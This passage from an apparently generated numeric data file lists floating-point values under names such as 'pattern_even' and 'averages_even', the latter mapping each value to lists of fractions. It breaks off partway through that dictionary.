0.448660714286, 0.452806122449, 0.454081632653, 0.45631377551, 0.459183673469, 0.461415816327, 0.463010204082, 0.463966836735, 0.464285714286, 0.466517857143, 0.468112244898, 0.473214285714, 0.474170918367, 0.479272959184, 0.479591836735, 0.481823979592, 0.484375, 0.488520408163, 0.489795918367, 0.492028061224, 0.494897959184, 0.497130102041, 0.498724489796, 0.499681122449, 0.5, 0.502232142857, 0.503826530612, 0.508928571429, 0.509885204082, 0.514987244898, 0.515306122449, 0.517538265306, 0.520089285714, 0.524234693878, 0.525510204082, 0.527742346939, 0.530612244898, 0.532844387755, 0.53443877551, 0.535395408163, 0.535714285714, 0.537946428571, 0.539540816327, 0.544642857143, 0.545599489796, 0.550701530612, 0.551020408163, 0.55325255102, 0.555803571429, 0.559948979592, 0.561224489796, 0.563456632653, 0.566326530612, 0.568558673469, 0.570153061224, 0.571109693878, 0.571428571429, 0.573660714286, 0.575255102041, 0.580357142857, 0.58131377551, 0.586415816327, 0.586734693878, 0.588966836735, 0.591517857143, 0.595663265306, 0.59693877551, 0.599170918367, 0.602040816327, 0.604272959184, 0.605867346939, 0.606823979592, 0.607142857143, 0.609375, 0.610969387755, 0.616071428571, 0.617028061224, 0.622130102041, 0.622448979592, 0.624681122449, 0.627232142857, 0.63137755102, 0.632653061224, 0.634885204082, 0.637755102041, 0.639987244898, 0.641581632653, 0.642538265306, 0.642857142857, 0.645089285714, 0.646683673469, 0.651785714286, 0.652742346939, 0.657844387755, 0.658163265306, 0.660395408163, 0.662946428571, 0.667091836735, 0.668367346939, 0.670599489796, 0.673469387755, 0.675701530612, 0.677295918367, 0.67825255102, 0.678571428571, 0.680803571429, 0.682397959184, 0.6875, 0.688456632653, 0.693558673469, 0.69387755102, 0.696109693878, 0.698660714286, 0.702806122449, 0.704081632653, 0.70631377551, 0.709183673469, 0.711415816327, 0.713010204082, 0.713966836735, 0.714285714286, 0.716517857143, 0.718112244898, 0.723214285714, 0.724170918367, 0.729272959184, 0.729591836735, 0.731823979592, 0.734375, 0.738520408163, 0.739795918367, 0.742028061224, 0.744897959184, 0.747130102041, 0.748724489796, 0.749681122449, 0.75, 0.752232142857, 0.753826530612, 0.758928571429, 0.759885204082, 0.764987244898, 0.765306122449, 0.767538265306, 0.770089285714, 0.774234693878, 0.775510204082, 0.777742346939, 0.780612244898, 0.782844387755, 0.78443877551, 0.785395408163, 0.785714285714, 0.787946428571, 0.789540816327, 0.794642857143, 0.795599489796, 0.800701530612, 0.801020408163, 0.80325255102, 0.805803571429, 0.809948979592, 0.811224489796, 0.813456632653, 0.816326530612, 0.818558673469, 0.820153061224, 0.821109693878, 0.821428571429, 0.823660714286, 0.825255102041, 0.830357142857, 0.83131377551, 0.836415816327, 0.836734693878, 0.838966836735, 0.841517857143, 0.845663265306, 0.84693877551, 0.849170918367, 0.852040816327, 0.854272959184, 0.855867346939, 0.856823979592, 0.857142857143, 0.859375, 0.860969387755, 0.866071428571, 0.867028061224, 0.872130102041, 0.872448979592, 0.874681122449, 0.877232142857, 0.88137755102, 0.882653061224, 0.884885204082, 0.887755102041, 0.889987244898, 0.891581632653, 0.892538265306, 0.892857142857, 0.895089285714, 0.896683673469, 0.901785714286, 0.902742346939, 0.907844387755, 0.908163265306, 0.910395408163, 0.912946428571, 0.917091836735, 0.918367346939, 0.920599489796, 0.923469387755, 0.925701530612, 0.927295918367, 0.92825255102, 0.928571428571, 0.930803571429, 0.932397959184, 0.9375, 0.938456632653, 0.943558673469, 0.94387755102, 0.946109693878, 0.948660714286, 0.952806122449, 0.954081632653, 0.95631377551, 0.959183673469, 0.961415816327, 0.963010204082, 0.963966836735, 0.964285714286, 0.966517857143, 0.968112244898, 0.973214285714, 0.974170918367, 0.979272959184, 0.979591836735, 0.981823979592, 0.984375, 0.988520408163, 0.989795918367, 0.992028061224, 0.994897959184, 0.997130102041, 0.998724489796, 0.999681122449]
pattern_even=[0.0, 0.002232142857, 0.003826530612, 0.008928571429, 0.009885204082, 0.014987244898, 0.015306122449, 0.017538265306, 0.020089285714, 0.024234693878, 0.025510204082, 0.027742346939, 0.030612244898, 0.032844387755, 0.03443877551, 0.035395408163, 0.035714285714, 0.037946428571, 0.039540816327, 0.044642857143, 0.045599489796, 0.050701530612, 0.051020408163, 0.05325255102, 0.055803571429, 0.059948979592, 0.061224489796, 0.063456632653, 0.066326530612, 0.068558673469, 0.070153061224, 0.071109693878, 0.071428571429, 0.073660714286, 0.075255102041, 0.080357142857, 0.08131377551, 0.086415816327, 0.086734693878, 0.088966836735, 0.091517857143, 0.095663265306, 0.09693877551, 0.099170918367, 0.102040816327, 0.104272959184, 0.105867346939, 0.106823979592, 0.107142857143, 0.109375, 0.110969387755, 0.116071428571, 0.117028061224, 0.122130102041, 0.122448979592, 0.124681122449, 0.127232142857, 0.13137755102, 0.132653061224, 0.134885204082, 0.137755102041, 0.139987244898, 0.141581632653, 0.142538265306, 0.142857142857, 0.145089285714, 0.146683673469, 0.151785714286, 0.152742346939, 0.157844387755, 0.158163265306, 0.160395408163, 0.162946428571, 0.167091836735, 0.168367346939, 0.170599489796, 0.173469387755, 0.175701530612, 0.177295918367, 0.17825255102, 0.178571428571, 0.180803571429, 0.182397959184, 0.1875, 0.188456632653, 0.193558673469, 0.19387755102, 0.196109693878, 0.198660714286, 0.202806122449, 0.204081632653, 0.20631377551, 0.209183673469, 0.211415816327, 0.213010204082, 0.213966836735, 0.214285714286, 0.216517857143, 0.218112244898, 0.223214285714, 0.224170918367, 0.229272959184, 0.229591836735, 0.231823979592, 0.234375, 0.238520408163, 0.239795918367, 0.242028061224, 0.244897959184, 0.247130102041, 0.248724489796, 0.249681122449, 0.25, 0.252232142857, 0.253826530612, 0.258928571429, 0.259885204082, 0.264987244898, 0.265306122449, 0.267538265306, 0.270089285714, 0.274234693878, 0.275510204082, 0.277742346939, 0.280612244898, 0.282844387755, 0.28443877551, 0.285395408163, 0.285714285714, 0.287946428571, 0.289540816327, 0.294642857143, 0.295599489796, 0.300701530612, 0.301020408163, 0.30325255102, 0.305803571429, 0.309948979592, 0.311224489796, 0.313456632653, 0.316326530612, 0.318558673469, 0.320153061224, 0.321109693878, 0.321428571429, 0.323660714286, 0.325255102041, 0.330357142857, 0.33131377551, 0.336415816327, 0.336734693878, 0.338966836735, 0.341517857143, 0.345663265306, 0.34693877551, 0.349170918367, 0.352040816327, 0.354272959184, 0.355867346939, 0.356823979592, 0.357142857143, 0.359375, 0.360969387755, 0.366071428571, 0.367028061224, 0.372130102041, 0.372448979592, 0.374681122449, 0.377232142857, 0.38137755102, 0.382653061224, 0.384885204082, 0.387755102041, 0.389987244898, 0.391581632653, 0.392538265306, 0.392857142857, 0.395089285714, 0.396683673469, 0.401785714286, 0.402742346939, 0.407844387755, 0.408163265306, 0.410395408163, 0.412946428571, 0.417091836735, 0.418367346939, 0.420599489796, 0.423469387755, 0.425701530612, 0.427295918367, 0.42825255102, 0.428571428571, 0.430803571429, 0.432397959184, 0.4375, 0.438456632653, 0.443558673469, 0.44387755102, 0.446109693878, 0.448660714286, 0.452806122449, 0.454081632653, 0.45631377551, 0.459183673469, 0.461415816327, 0.463010204082, 0.463966836735, 0.464285714286, 0.466517857143, 0.468112244898, 0.473214285714, 0.474170918367, 0.479272959184, 0.479591836735, 0.481823979592, 0.484375, 0.488520408163, 0.489795918367, 0.492028061224, 0.494897959184, 0.497130102041, 0.498724489796, 0.499681122449, 0.5, 0.502232142857, 0.503826530612, 0.508928571429, 0.509885204082, 0.514987244898, 0.515306122449, 0.517538265306, 0.520089285714, 0.524234693878, 0.525510204082, 0.527742346939, 0.530612244898, 0.532844387755, 0.53443877551, 0.535395408163, 0.535714285714, 0.537946428571, 0.539540816327, 0.544642857143, 0.545599489796, 0.550701530612, 0.551020408163, 0.55325255102, 0.555803571429, 0.559948979592, 0.561224489796, 0.563456632653, 0.566326530612, 0.568558673469, 0.570153061224, 0.571109693878, 0.571428571429, 0.573660714286, 0.575255102041, 0.580357142857, 0.58131377551, 0.586415816327, 0.586734693878, 0.588966836735, 0.591517857143, 0.595663265306, 0.59693877551, 0.599170918367, 0.602040816327, 0.604272959184, 0.605867346939, 0.606823979592, 0.607142857143, 0.609375, 0.610969387755, 0.616071428571, 0.617028061224, 0.622130102041, 0.622448979592, 0.624681122449, 0.627232142857, 0.63137755102, 0.632653061224, 0.634885204082, 0.637755102041, 0.639987244898, 0.641581632653, 0.642538265306, 0.642857142857, 0.645089285714, 0.646683673469, 0.651785714286, 0.652742346939, 0.657844387755, 0.658163265306, 0.660395408163, 0.662946428571, 0.667091836735, 0.668367346939, 0.670599489796, 0.673469387755, 0.675701530612, 0.677295918367, 0.67825255102, 0.678571428571, 0.680803571429, 0.682397959184, 0.6875, 0.688456632653, 0.693558673469, 0.69387755102, 0.696109693878, 0.698660714286, 0.702806122449, 0.704081632653, 0.70631377551, 0.709183673469, 0.711415816327, 0.713010204082, 0.713966836735, 0.714285714286, 0.716517857143, 0.718112244898, 0.723214285714, 0.724170918367, 0.729272959184, 0.729591836735, 0.731823979592, 0.734375, 0.738520408163, 0.739795918367, 0.742028061224, 0.744897959184, 0.747130102041, 0.748724489796, 0.749681122449, 0.75, 0.752232142857, 0.753826530612, 0.758928571429, 0.759885204082, 0.764987244898, 0.765306122449, 0.767538265306, 0.770089285714, 0.774234693878, 0.775510204082, 0.777742346939, 0.780612244898, 0.782844387755, 0.78443877551, 0.785395408163, 0.785714285714, 0.787946428571, 0.789540816327, 0.794642857143, 0.795599489796, 0.800701530612, 0.801020408163, 0.80325255102, 0.805803571429, 0.809948979592, 0.811224489796, 0.813456632653, 0.816326530612, 0.818558673469, 0.820153061224, 0.821109693878, 0.821428571429, 0.823660714286, 0.825255102041, 0.830357142857, 0.83131377551, 0.836415816327, 0.836734693878, 0.838966836735, 0.841517857143, 0.845663265306, 0.84693877551, 0.849170918367, 0.852040816327, 0.854272959184, 0.855867346939, 0.856823979592, 0.857142857143, 0.859375, 0.860969387755, 0.866071428571, 0.867028061224, 0.872130102041, 0.872448979592, 0.874681122449, 0.877232142857, 0.88137755102, 0.882653061224, 0.884885204082, 0.887755102041, 0.889987244898, 0.891581632653, 0.892538265306, 0.892857142857, 0.895089285714, 0.896683673469, 0.901785714286, 0.902742346939, 0.907844387755, 0.908163265306, 0.910395408163, 0.912946428571, 0.917091836735, 0.918367346939, 0.920599489796, 0.923469387755, 0.925701530612, 0.927295918367, 0.92825255102, 0.928571428571, 0.930803571429, 0.932397959184, 0.9375, 0.938456632653, 0.943558673469, 0.94387755102, 0.946109693878, 0.948660714286, 0.952806122449, 0.954081632653, 0.95631377551, 0.959183673469, 0.961415816327, 0.963010204082, 0.963966836735, 0.964285714286, 0.966517857143, 0.968112244898, 0.973214285714, 0.974170918367, 0.979272959184, 0.979591836735, 0.981823979592, 0.984375, 0.988520408163, 0.989795918367, 0.992028061224, 0.994897959184, 0.997130102041, 0.998724489796, 0.999681122449]
averages_even={0.0: [0.5, 0.0], 0.109375: [0.875, 0.125], 0.1875: [0.25, 0.75], 0.392857142857: [0.5, 0.0], 0.127232142857: [0.375, 0.625], 0.188456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.209183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.744897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.856823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.5: [0.5, 0.0], 0.946109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.657844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.03443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.244897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.354272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.535714285714: [0.5, 0.0], 0.473214285714: [0.75, 0.25], 0.78443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.753826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.59693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.537946428571: [0.875, 0.125], 0.813456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.780612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.015306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.488520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.999681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.559948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.382653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.651785714286: [0.75, 0.25], 0.009885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.823660714286: [0.875, 0.125], 0.6875: [0.75, 0.25], 0.412946428571: [0.375, 0.625], 0.882653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.502232142857: [0.875, 0.125], 0.270089285714: [0.375, 0.625], 0.08131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.75: [0.5, 0.0], 0.104272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.973214285714: [0.75, 0.25], 0.443558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.713010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.253826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.887755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.035714285714: [0.5, 0.0], 0.287946428571: [0.875, 0.125], 0.142538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.892857142857: [0.5, 0.0], 0.238520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.345663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.561224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.680803571429: [0.875, 0.125], 0.177295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.988520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.259885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.454081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.45631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.377232142857: [0.375, 0.625], 0.19387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.580357142857: [0.75, 0.25], 0.742028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.032844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.981823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.357142857143: [0.5, 0.0], 0.645089285714: [0.875, 0.125], 0.468112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.425701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.277742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.535395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.258928571429: [0.25, 0.75], 0.086415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.588966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.372448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.938456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.867028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.355867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.366071428571: [0.75, 0.25], 0.294642857143: [0.25, 0.75], 0.713966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.464285714286: [0.5, 0.0], 0.017538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.313456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.738520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.854272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.606823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.675701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.948660714286: [0.375, 0.625], 0.389987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.020089285714: [0.375, 0.625], 0.67825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.384885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.359375: [0.875, 0.125], 0.265306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.770089285714: [0.375, 0.625], 0.099170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.575255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.289540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.395089285714: [0.875, 0.125], 0.917091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.821428571429: [0.5, 0.0], 0.658163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.927295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.178571428571: [0.5, 0.0], 0.670599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.352040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.311224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.014987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.213010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.729272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.709183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.071109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.229272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.604272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.09693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.821109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.338966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.461415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.652742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.723214285714: [0.75, 0.25], 0.231823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.066326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.55325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.275510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.452806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.157844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.989795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.002232142857: [0.875, 0.125], 0.624681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.336734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.489795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.84693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.05325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.63137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.800701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.525510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.420599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.039540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.9375: [0.75, 0.25], 0.678571428571: [0.5, 0.0], 0.080357142857: [0.25, 0.75], 0.151785714286: [0.25, 0.75], 0.866071428571: [0.75, 0.25], 0.80325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.320153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.198660714286: [0.375, 0.625], 0.202806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.627232142857: [0.375, 0.625], 0.774234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.479591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.739795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.563456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.891581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.497130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.545599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.162946428571: [0.375, 0.625], 0.908163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.711415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.050701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.896683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.860969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.902742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.765306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.282844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.463966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.356823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.360969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.702806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.794642857143: [0.75, 0.25], 0.830357142857: [0.75, 0.25], 0.928571428571: [0.5, 0.0], 0.923469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.204081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.918367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.677295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.401785714286: [0.75, 0.25], 0.146683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.025510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.836734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.747130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.38137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.063456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.855867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.418367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.168367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.474170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.239795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.196109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.752232142857: [0.875, 0.125], 0.825255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.789540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.816326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.106823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.075255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.027742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.550701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.17825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.402742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.503826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.508928571429: [0.75, 0.25], 0.92825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.595663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.341517857143: [0.375, 0.625], 0.318558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.213966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.423469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.374681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.809948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.599170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.716517857143: [0.875, 0.125], 0.943558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.035395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.438456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.295599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.994897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.145089285714: [0.875, 0.125], 0.729591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.609375: [0.875, 0.125], 0.229591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.494897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.309948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.857142857143: [0.5, 0.0], 0.4375: [0.75, 0.25], 0.852040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.484375: [0.375, 0.625], 0.895089285714: [0.875, 0.125], 0.524234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.158163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.642857142857: [0.5, 0.0], 0.321109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.952806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.285714285714: [0.5, 0.0], 0.408163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.660395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.966517857143: [0.875, 0.125], 0.872448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.070153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.141581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.446109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.998724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.330357142857: [0.75, 0.25], 0.44387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.008928571429: [0.25, 0.75], 0.910395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.968112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.83131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.105867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.963010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.764987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.805803571429: [0.625, 0.375], 0.030612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.305803571429: [0.375, 0.625], 0.134885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.731823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.573660714286: [0.875, 0.125], 0.591517857143: [0.375, 0.625], 0.055803571429: [0.375, 0.625], 0.142857142857: [0.5, 